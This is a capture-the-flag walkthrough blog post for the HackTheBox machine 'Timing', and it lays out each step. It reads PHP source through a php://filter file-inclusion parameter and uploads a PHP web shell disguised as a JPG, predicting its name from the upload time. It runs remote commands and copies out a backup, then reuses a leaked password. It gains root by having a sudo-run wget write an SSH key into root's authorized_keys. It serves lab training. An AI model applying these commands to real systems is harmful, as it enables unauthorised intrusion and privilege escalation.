Timing from HackTheBox — Detailed Walkthrough

13 min read
Jun 3, 2022


Showing you all the tools and techniques needed to complete the box.

Timing is an easy level machine by irogir on HackTheBox. It focuses on application vulnerabilities, both web and shell based.

Machine Information

Timing from HackTheBox

Our starting point is a login page on the website on port 80, which we find a way in to by looking for files and folders with wfuzz. Using a vulnerable php page we leak credentials and we have access. Further enumeration and code review allows us to escalate our role in the web app to admin. In there we have a way to upload a malicious document containing code execution. We find a way to get the unique file name it has allowing us to execute commands on the box remotely. We exfiltrate a backup and find credentials in there to get ssh as a user. Escalation to root is via a vulnerable app we find on the box, where we exploit its insecure use of wget to gain a root shell.

Initial Recon

As always let’s start with Nmap:

Nmap scan of the box

Just two ports open, let’s have a look at Apache on port 80:

Gobuster Enumeration

We have a login box, but nothing else. I tried a few obvious credentials but didn’t get any where so let’s try gobuster:

gobuster scan for subfolders

Not a lot to go on so I tried looking for files with php extensions and found this:

gobuster scan for php files


Interesting that the image.php file doesn’t redirect to login.php like the others do. I tried fuzzing, took me quite a while but eventually I ended up with this:

wfuzzing the parameters

Dumping passwd

By using the img parameter and fuzzing I get some responses with 25 chars. This tells us the web server is responding with something. Let’s try and grab the passwd file:

Trying to download the passwd file with curl

Ok so we’re getting somewhere. Next we need to try and bypass that filter. I used this which is something I used on the BountyHunter box here:

Grabbing passwd file with curl

This worked and the response is base64 encoded so we can decode and use grep to just give us the accounts that can logon:

Grabbing passwd file using curl and base64 decode

Simple WebApp Login

We have a user called aaron. Going back to that initial login box we saw earlier, now with a username it was simple to login:

Simple WebApp login

We end up here:

Logged in as user 2

We aren’t sure what the significance of being user 2 is at this point, and there’s nothing else you can do once logged in. So going back to our gobuster output I grab the upload.php file:

└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=upload.php' | base64 -d

Code Review

Looking through the code it’s fairly simple to see what it does. It takes the file uploaded by the user, checks it has a .jpg extension, and stores its name in $file_name. Then it creates a unique hash value by taking the md5 hash of the current time, and combining that with the file name. It then stores the file in /images/uploads. There is one sneaky section of the script that needs to be understood, otherwise you will be stuck trying to determine the filename that has been created.

Looking at the first section of the file:

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
mkdir($upload_dir, 0777, true);

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;

Notice that there is a variable called $file_hash created with a value set by uniqid(). This article explains what the function does, but essentially it’s like time() but in microseconds so a much bigger value. The important bit is here:

md5('$file_hash' . time())

In PHP single and double quotes work differently with strings. See this article, but basically the value of he $file_hash variable is never used.

We also see there is another file included in this one called admin_auth_check.php, let’s look at that:

└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php' | base64 -d

include_once "auth_check.php";

if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');

We can see this file is checking the value of the session role. If it’s not equal to 1 then you have no access to a panel. We don’t know what that means yet!

WebApp Admin Access

Going back to our web browser, we already have a session authenticated as aaron. If you click on the Edit Profile link at the top you end up here:

Edit profile of user

Time to fire up Burp and see what is going on in the background. Once you have Burp intercepting requests and your browser set to use it click that blue update button on the webpage. We intercept the post:

Burp intercept user

Add our new role on the end:

Burp change role of user

Forward to server, then switch back to browser:

Profile was updated

We see our profile is updated, now refresh your browser to see we have a new option called Admin panel, click on that to get to here:

Access to admin panel

Web Shell

We’ve found the image upload area which is using the PHP file we looked at earlier. It’s safe to assume this will be our method of gaining remote code execution. Let’s start with a simple web shell. We know from the code review that there’s a file extension check, but not a check of the contents of the file. We can easily bypass the check like this:

└─# cat pencer.jpg
<?php system($_GET[cmd]);?>

We’ve used this a number of time before like on Nineveh and Forge. However it’s slightly more complicated here because the resulting filename also has an md5 hash of the current time prepended to it.

We can create our own simple filename generator to help. This is what the PHP file is doing:

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);

Let’s test our own version:

└─# date
Wed 22 Dec 17:13:27 GMT 2021

Use current time:

└─# php -a
Interactive mode enabled
php > echo (md5('$file_hash' . strtotime('Wed 22 Dec 17:13:27 GMT 2021')) . '_pencer.jpg');

So using interactive php mode we can take the line from the code we reviewed and replace time() with the current time on my Kali box. Then append the name of the file we created that will be used for command execution. The resulting filename is what we will need to use once it’s uploaded.

Let’s do it for real. Go back to the upload form and select our web shell:

upload image

Make sure your browser is set to use Burp as the proxy, and that Burp is set to intercept. Click the upload image button then switch to Burp to see it’s intercepted:

Burp intercept image upload

We can see at the bottom our code is intact. Right click and choose Send to Repeater, then switch to the Repeater tab and click Send:

Burp repeater showing date and time file was uploaded

We see on the right the the file was uploaded, now copy take note of the date and time on the server response:

Wed, 22 Dec 2021 17:21:43 GMT

We use this with our PHP like before:

└─# php -a
Interactive mode enabled
php > echo (md5('$file_hash' . strtotime('Wed, 22 Dec 2021 17:21:43 GMT')) . '_pencer.jpg');

Remote Code Execution

We now have the filename we can call remotely using curl. Let’s test it with whoami:

└─# curl 'http://timing.htb/image.php?img=images/uploads/e087b23f34a4f7d6c841db302e7d88ca_pencer.jpg&cmd=whoami'

That works. However I spent a long time trying to get a reverse shell with no luck. Back to enumerating the file system and eventually I found this:

└─# curl 'http://timing.htb/image.php?img=images/uploads/e087b23f34a4f7d6c841db302e7d88ca_pencer.jpg&cmd=ls+-lsa+/opt'
total 624
616 -rw-r--r-- 1 root root 627851 Jul 20 22:36 source-files-backup.zip

A backup file, we definitely want to have a look at that. First copy it to the uploads folder that we have access to:

└─# curl 'http://timing.htb/image.php?img=images/uploads/e087b23f34a4f7d6c841db302e7d88ca_pencer.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/images/uploads/'

Now we can download it:

Download backup.zip using curl

Backup File Exploration

Unzip it and have a look:

Unzip backup file

Looking through the files we find something interesting in db_conn.php:

└─# cat db_conn.php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');

Could it be that aaron has reused that mysql password for ssh access:

└─# ssh aaron@timing.htb
aaron@timing.htb's password:
Permission denied, please try again.

Ok that didn’t work. However looking further at the backup files we see there’s a Git repository. Seems a little suspicious!


Let’s use GitTools like we did on Devzat and extract the source files. Download them if needed:

└─# git clone https://github.com/internetwache/GitTools.git
Cloning into 'GitTools'...
remote: Enumerating objects: 229, done.
remote: Counting objects: 100% (20/20), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 229 (delta 6), reused 7 (delta 2), pack-reused 209
Receiving objects: 100% (229/229), 52.92 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (85/85), done.

Use the extractor script on the backup folder:

Extract git archive using GitTools

Now look at the extractor files:

└─# ll extracted
drwxr-xr-x 5 root root 4096 Dec 22 17:43 0-16de2698b5b122c93461298eab730d00273bd83e
drwxr-xr-x 5 root root 4096 Dec 22 17:43 1-e4e214696159a25c69812571c8214d2bf8736a3f

There are two commits. Again like we did on Devzat we can use diff as a simple way to see what changed between commits:

Use diff to check changes between folders

SSH As Aaron

The only change is the password in that db_conn.php file we tried earlier with aaron on SSH. Let’s try this one:

└─# ssh aaron@timing.htb
aaron@timing.htb's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

System information as of Wed Dec 22 17:45:49 UTC 2021

Last login: Wed Dec 22 17:41:31 2021 from

Ok, we knew that was gonna work didn’t we!

Sudo Permissions

As usual, check the few obvious things before using something like LinPEAS. Here I started with sudo which was the right place:

aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
(ALL) NOPASSWD: /usr/bin/netutils

Vulnerable Java App

What is netutils:

aaron@timing:~$ file /usr/bin/netutils
/usr/bin/netutils: Bourne-Again shell script, ASCII text executable

aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar

This shell script runs a Java application in the root folder, and we can run it as root without a password. Sounds interesting, let’s have a look what it does:

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >>

We have two options with this util, FTP or HTTP, whichever you pick it then asks for a file. This can be hosted remotely, so let’s start a webserver on Kali first:

└─# python3 -m http.server 80

Now switch back to the box and try to grab a file from Kali:

netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 0
Enter Url+File:

I tried grabbing that fake jpg we made earlier using FTP but nothing happened. Checking my webserver on Kali there was no connection attempt. Let’s try http:

netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url:
Initializing download:
File size: 28 bytes
Opening output file pencer.jpg
Server unsupported, starting from scratch with one connection.
Starting download
Downloaded 28 byte in 0 seconds. (0.27 KB/s)

That looks more promising. Checking our webserver on Kali I see a connection from the box and the file was retrieved. Looking locally I see the file is there, and it’s owned by root.


We could pull a file across using wget, so we can assume there is a vulnerability in this util that we need to exploit. To understand how it works lets use pspy64 just like we did many other times, most recently on Static. If you haven’t already got it the grab from here, I have it already so just need to copy it to the path of my webserver I’m running on Kali:

└─# locate pspy64

└─# cd htb/timing

└─# cp /root/htb/static/pspy64 .

Now back to the box, pull pspy64 across and start it running:

Pspy running on the box

With that running in our current SSH session log in to a second one and then run netutils again. Do the same option 0 for FTP and option 1 for HTTP as before, again trying to pull my pencer.jpg file across. Now switch back to the pspy64 session to see what is happening:

Pspy shows wget is being used

Wget Exploit

We can see the netutils java app is using wget for FTP connections, and axel for HTTP. I later found It’s possible to complete this box by exploiting axel, but I did it using FTP so we’ll follow that method.

There’s another HTB box called Kotarak that has a similar path, this walk through helped me here. The key part to know is that wget looks for a startup file when it’s run. From the docs here we can see how that works:

When initializing, Wget will look for a global startup file, /usr/local/etc/wgetrc by default (or some prefix other than /usr/local, if Wget was not installed there) and read commands from there, if it exists.

Then it will look for the user’s file. If the environmental variable WGETRC is set, Wget will try to load that file. Failing that, no further attempts will be made.

If WGETRC is not set, Wget will try to load $HOME/.wgetrc.

On this box we find there is no global file so we can exploit this by creating our own .wgetrc file in aaron’s /home folder. Looking at the available commands here we see that there is an option to set the name and path of the retrieved file. We can run the java app as root so we have access to /root as a writeable location. Let’s put our Kali public SSH key in there so we can log in as root without a password.

First create the .wgetrc config file in /home/aaron:

aaron@timing:~$ cat <<_EOF_>.wgetrc
> output_document = /root/.ssh/authorized_keys
> _EOF_

Over on Kali create our SSH keys if needed:

└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:B/SsKx8Z8AU/c40jKybaq8OpWpTVdl2Yz0e/ktMxXxY root@kali
The key's randomart image is:
+---[RSA 3072]----+
| o o. |
| . . *o. o.E |
| . + o Xo+....|
| o . + + *o..o+|
| o . S o .o.*|
| . o o * + o.|
| ....o + o |
| . + + . |
|.....o. . |

Put a copy of public key in our working folder:

└─# cp .ssh/id_rsa.pub htb/timing

Python FTP Server

Install the Python3 FTP library if needed:

Install pyftpdlib

Now start an FTP server so we can get to our SSH public key:

└─# python3 -m pyftpdlib -p 21
[I 2021-12-29 22:15:26] concurrency model: async
[I 2021-12-29 22:15:26] masquerade (NAT) address: None
[I 2021-12-29 22:15:26] passive ports: None
[I 2021-12-29 22:15:26] >>> starting FTP server on, pid=1597 <<<

Switch back to the box and run the netutils app again, this time choose 0 for FTP and enter our Kali IP and the SSH public key we are hosting there:

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 0
Enter Url+File:

Now back to Kali and check the file was requested:

FTP server running on Kali

SSH As Root

It was, so start a new terminal and log in to the box as root:

└─# ssh root@timing.htb
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)
Last login: Tue Dec 7 12:08:29 2021

Grab the flag and we’re done:

root@timing:~# cat /root/root.txt 

That’s another box done. I really enjoyed this one as it needed a fair bit of thinking to work through it. See you next time.

Originally published at https://pencer.io on June 3, 2022.



Eat. Sleep. Hack. Repeat. I like hacking. A lot of hacking. Mostly CTFs, but then other stuff too when I get round to it.